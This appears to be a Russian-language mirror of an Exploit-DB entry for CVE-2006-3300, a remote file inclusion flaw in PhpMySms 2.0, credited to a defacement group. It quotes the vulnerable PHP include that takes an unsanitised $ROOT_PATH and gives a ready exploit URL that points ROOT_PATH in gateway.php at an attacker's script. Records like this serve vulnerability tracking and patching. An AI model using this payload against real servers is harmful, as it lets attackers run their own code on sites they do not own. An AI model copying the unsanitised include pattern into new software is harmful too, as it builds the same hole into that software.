- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 1948
- Проверка EDB
-
- Пройдено
- Автор
- PERSIAN-DEFACER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-3300
- Дата публикации
- 2006-06-24
Код:
PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
Author=Persian-Defacer
www.Hacking-Boys.com
==============================================================
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
include ("config.php");
} else {
include ("$ROOT_PATH/config.php");
}
==============================================================
Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]
# milw0rm.com [2006-06-24]
- Источник
- www.exploit-db.com